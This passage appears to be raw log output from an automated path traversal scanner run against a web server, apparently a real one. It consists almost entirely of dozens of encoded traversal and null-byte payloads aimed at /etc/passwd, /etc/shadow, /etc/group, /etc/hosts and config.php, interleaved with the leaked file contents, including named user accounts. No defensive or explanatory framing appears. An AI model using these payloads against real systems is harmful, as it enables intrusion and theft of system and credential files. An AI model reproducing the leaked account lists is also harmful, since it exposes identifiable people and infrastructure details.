  2896. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2897. tcpdump:x:72:72::/:/sbin/nologin
  2898. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2899. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2900. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2901. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2902. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2903. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2904. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2905. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2906. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2907. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2908. memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
  2909. <b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00</b>root:x:0:0:root:/root:/bin/bash
  2910. bin:x:1:1:bin:/bin:/sbin/nologin
  2911. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2912. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2913. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2914. sync:x:5:0:sync:/sbin:/bin/sync
  2915. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2916. halt:x:7:0:halt:/sbin:/sbin/halt
  2917. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2918. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2919. operator:x:11:0:operator:/root:/sbin/nologin
  2920. games:x:12:100:games:/usr/games:/sbin/nologin
  2921. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2922. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2923. nobody:x:99:99:Nobody:/:/sbin/nologin
  2924. dbus:x:81:81:System message bus:/:/sbin/nologin
  2925. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2926. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2927. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2928. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2929. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2930. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2931. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2932. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2933. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2934. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2935. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2936. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2937. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2938. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2939. tcpdump:x:72:72::/:/sbin/nologin
  2940. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2941. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2942. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2943. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2944. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2945. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2946. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2947. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2948. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2949. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  2950. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  2951. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  2952. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2953. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  2954. <b>Query Used: /etc/passwd^^%00</b>.<b>Query Used: /etc/group%00</b>root:x:0:root
  2955. bin:x:1:root,bin,daemon
  2956. daemon:x:2:root,bin,daemon
  2957. sys:x:3:root,bin,adm
  2958. adm:x:4:root,adm,daemon
  2959. tty:x:5:
  2960. disk:x:6:root
  2961. lp:x:7:daemon,lp
  2962. mem:x:8:
  2963. kmem:x:9:
  2964. wheel:x:10:root
  2965. mail:x:12:mail,postfix
  2966. uucp:x:14:uucp
  2967. man:x:15:
  2968. games:x:20:
  2969. gopher:x:30:
  2970. video:x:39:
  2971. dip:x:40:
  2972. ftp:x:50:
  2973. lock:x:54:
  2974. audio:x:63:
  2975. nobody:x:99:
  2976. users:x:100:
  2977. dbus:x:81:
  2978. utmp:x:22:
  2979. utempter:x:35:
  2980. floppy:x:19:
  2981. vcsa:x:69:
  2982. rpc:x:32:
  2983. abrt:x:499:
  2984. cdrom:x:11:
  2985. tape:x:33:
  2986. dialout:x:18:
  2987. saslauth:x:498:
  2988. mailnull:x:47:
  2989. smmsp:x:51:
  2990. haldaemon:x:68:haldaemon
  2991. ntp:x:38:
  2992. rpcuser:x:29:
  2993. nfsnobody:x:65534:
  2994. apache:x:48:
  2995. webalizer:x:67:
  2996. sshd:x:74:
  2997. postdrop:x:90:
  2998. postfix:x:89:
  2999. tcpdump:x:72:
  3000. slocate:x:21:
  3001. stapdev:x:497:
  3002. stapusr:x:496:
  3003. sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
  3004. cmccan:x:500:
  3005. darnold:x:501:
  3006. kmars:x:503:
  3007. mstrydom:x:533:
  3008. zabbix:x:309:
  3009. clamav:x:311:
  3010. clamupdate:x:312:
  3011. clam:x:308:
  3012. cgred:x:307:
  3013. ahps:x:303:
  3014. nscanner:x:424:
  3015. memcached:x:302:
  3016. stapsys:x:157:
  3017. <b>Query Used: \\\\\\\etc/\passwd%00</b>.<b>Query Used: /etc/shadow^^%00</b>.<b>Query Used: /bin/id|%00</b>.<b>Query Used: ././././././etc//passwd%00</b>.<b>Query Used: /..\..\..\..\..\..\etc/passwd%00</b>.<b>Query Used: /..\..\..\..\..\..\etc/shadow%00</b>.<b>Query Used: \.\.\.\.\.\.\etc/\passwd%00</b>.<b>Query Used: /./././././././././././etc/passwd%00</b>.<b>Query Used: /./././././././././././etc/shadow%00</b>.<b>Query Used: /./././././././././././etc/group%00</b>.<b>Query Used: ......etc/passwd%00</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\passwd%00</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\group%00</b>.<b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00</b><b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00</b><b>Query Used: /%00//%00//%00//%00//%00//etc//shadow%00</b><b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/passwd%00</b>.<b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/shadow%00</b>.<b>Query Used: ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63%00</b>.<b>Query Used: ..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd%00</b>.<b>Query Used: ..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd%00</b>.<b>Query Used: \.\.\.\.\.\.etc/passwd%00</b>.<b>Query Used: etc/passwd%00</b>.<b>Query Used: etc/shadow%00</b>.<b>Query Used: %00</b>.<b>Query Used: %00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow%00</b>.<b>Query Used: .%5c..%5c/..%c0%9v..%5c.%5c..%5c/..%c0%9v%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00</b>.<b>Query Used: ..%255c%00</b>.<b>Query Used: .%5c..%5c%00</b>.<b>Query Used: /..%c0%9v%00</b>.<b>Query Used: /%00</b>.<b>Query Used: /..%255c..%255c%00</b>.<b>Query Used: ///%00</b>.<b>Query Used: /..%255c..%255c/..%255c..%255c/..%255c..%255c%00</b>.<b>Query Used: ..%255c%00</b>.<b>Query Used: .%5c..%5c/..%c0%9v%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow%00</b>.<b>Query Used: ./\./\./\./\./\./\./etc/hosts%00</b>.<b>Query Used: \./\./\./\./\./\./\etc/\passwd%00</b>.<b>Query Used: \./\./\./\./\./\./\proc/\self/ d/%00</b>.<b>Query Used: /////config.php%00</b>.<b>Query Used: ..\/..\/..\/..\/config.php%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00</b>.<b>Query Used: config.php%00</b>.<b>Query Used: ..%25%35%63..%25%35%63..%25%35%63config.php%00</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php%00</b>.<b>Query Used: %00.php</b><b>Query Used: etc/hosts%00.php</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
  3018. ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
  3019. <b>Query Used: etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3020. bin:x:1:1:bin:/bin:/sbin/nologin
  3021. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3022. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3023. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3024. sync:x:5:0:sync:/sbin:/bin/sync
  3025. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3026. halt:x:7:0:halt:/sbin:/sbin/halt
  3027. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3028. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3029. operator:x:11:0:operator:/root:/sbin/nologin
  3030. games:x:12:100:games:/usr/games:/sbin/nologin
  3031. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3032. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3033. nobody:x:99:99:Nobody:/:/sbin/nologin
  3034. dbus:x:81:81:System message bus:/:/sbin/nologin
  3035. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3036. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3037. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3038. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3039. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3040. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3041. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3042. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3043. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3044. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3045. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3046. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3047. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3048. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3049. tcpdump:x:72:72::/:/sbin/nologin
  3050. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3051. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3052. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3053. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3054. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3055. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3056. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3057. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3058. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3059. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3060. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3061. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3062. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3063. <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00.php</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00.php</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00.php</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00.php</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00.php</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/passwd%00.php</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00.php</b>.<b>Query Used: /%00.php</b><b>Query Used: %00/%00.php</b><b>Query Used: /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00.php</b>.<b>Query Used: %2A%00.php</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3064. bin:x:1:1:bin:/bin:/sbin/nologin
  3065. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3066. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3067. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3068. sync:x:5:0:sync:/sbin:/bin/sync
  3069. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3070. halt:x:7:0:halt:/sbin:/sbin/halt
  3071. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3072. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3073. operator:x:11:0:operator:/root:/sbin/nologin
  3074. games:x:12:100:games:/usr/games:/sbin/nologin
  3075. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3076. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3077. nobody:x:99:99:Nobody:/:/sbin/nologin
  3078. dbus:x:81:81:System message bus:/:/sbin/nologin
  3079. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3080. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3081. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3082. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3083. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3084. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3085. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3086. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3087. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3088. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3089. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3090. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3091. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3092. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3093. tcpdump:x:72:72::/:/sbin/nologin
  3094. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3095. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3096. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3097. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3098. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3099. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3100. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3101. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3102. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3103. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3104. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3105. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3106. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3107. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3108. <b>Query Used: /////etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3109. bin:x:1:1:bin:/bin:/sbin/nologin
  3110. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3111. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3112. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3113. sync:x:5:0:sync:/sbin:/bin/sync
  3114. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3115. halt:x:7:0:halt:/sbin:/sbin/halt
  3116. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3117. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3118. operator:x:11:0:operator:/root:/sbin/nologin
  3119. games:x:12:100:games:/usr/games:/sbin/nologin
  3120. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3121. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3122. nobody:x:99:99:Nobody:/:/sbin/nologin
  3123. dbus:x:81:81:System message bus:/:/sbin/nologin
  3124. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3125. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3126. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3127. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3128. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3129. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3130. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3131. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3132. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3133. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3134. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3135. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3136. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3137. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3138. tcpdump:x:72:72::/:/sbin/nologin
  3139. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3140. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3141. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3142. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3143. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3144. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3145. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3146. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3147. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3148. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3149. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3150. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3151. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3152. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3153. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00.php</b>root:x:0:root
  3154. bin:x:1:root,bin,daemon
  3155. daemon:x:2:root,bin,daemon
  3156. sys:x:3:root,bin,adm
  3157. adm:x:4:root,adm,daemon
  3158. tty:x:5:
  3159. disk:x:6:root
  3160. lp:x:7:daemon,lp
  3161. mem:x:8:
  3162. kmem:x:9:
  3163. wheel:x:10:root
  3164. mail:x:12:mail,postfix
  3165. uucp:x:14:uucp
  3166. man:x:15:
  3167. games:x:20:
  3168. gopher:x:30:
  3169. video:x:39:
  3170. dip:x:40:
  3171. ftp:x:50:
  3172. lock:x:54:
  3173. audio:x:63:
  3174. nobody:x:99:
  3175. users:x:100:
  3176. dbus:x:81:
  3177. utmp:x:22:
  3178. utempter:x:35:
  3179. floppy:x:19:
  3180. vcsa:x:69:
  3181. rpc:x:32:
  3182. abrt:x:499:
  3183. cdrom:x:11:
  3184. tape:x:33:
  3185. dialout:x:18:
  3186. saslauth:x:498:
  3187. mailnull:x:47:
  3188. smmsp:x:51:
  3189. haldaemon:x:68:haldaemon
  3190. ntp:x:38:
  3191. rpcuser:x:29:
  3192. nfsnobody:x:65534:
  3193. apache:x:48:
  3194. webalizer:x:67:
  3195. sshd:x:74:
  3196. postdrop:x:90:
  3197. postfix:x:89:
  3198. tcpdump:x:72:
  3199. slocate:x:21:
  3200. stapdev:x:497:
  3201. stapusr:x:496:
  3202. sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
  3203. cmccan:x:500:
  3204. darnold:x:501:
  3205. kmars:x:503:
  3206. mstrydom:x:533:
  3207. zabbix:x:309:
  3208. clamav:x:311:
  3209. clamupdate:x:312:
  3210. clam:x:308:
  3211. cgred:x:307:
  3212. ahps:x:303:
  3213. nwschat:x:320:
  3214. forecast:x:302:
  3215. ndfd:x:306:
  3216. nscanner:x:424:
  3217. memcached:x:301:
  3218. stapsys:x:157:
  3219. <b>Query Used: ///////etc//passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3220. bin:x:1:1:bin:/bin:/sbin/nologin
  3221. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3222. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3223. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3224. sync:x:5:0:sync:/sbin:/bin/sync
  3225. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3226. halt:x:7:0:halt:/sbin:/sbin/halt
  3227. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3228. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3229. operator:x:11:0:operator:/root:/sbin/nologin
  3230. games:x:12:100:games:/usr/games:/sbin/nologin
  3231. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3232. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3233. nobody:x:99:99:Nobody:/:/sbin/nologin
  3234. dbus:x:81:81:System message bus:/:/sbin/nologin
  3235. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3236. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3237. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3238. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3239. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3240. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3241. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3242. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3243. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3244. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3245. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3246. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3247. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3248. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3249. tcpdump:x:72:72::/:/sbin/nologin
  3250. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3251. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3252. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3253. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3254. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3255. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3256. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3257. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3258. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3259. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3260. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3261. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3262. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3263. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3264. bin:x:1:1:bin:/bin:/sbin/nologin
  3265. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3266. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3267. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3268. sync:x:5:0:sync:/sbin:/bin/sync
  3269. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3270. halt:x:7:0:halt:/sbin:/sbin/halt
  3271. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3272. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3273. operator:x:11:0:operator:/root:/sbin/nologin
  3274. games:x:12:100:games:/usr/games:/sbin/nologin
  3275. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3276. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3277. nobody:x:99:99:Nobody:/:/sbin/nologin
  3278. dbus:x:81:81:System message bus:/:/sbin/nologin
  3279. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3280. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3281. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3282. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3283. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3284. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3285. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3286. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3287. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3288. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3289. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3290. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3291. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3292. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3293. tcpdump:x:72:72::/:/sbin/nologin
  3294. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3295. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3296. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3297. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3298. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3299. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
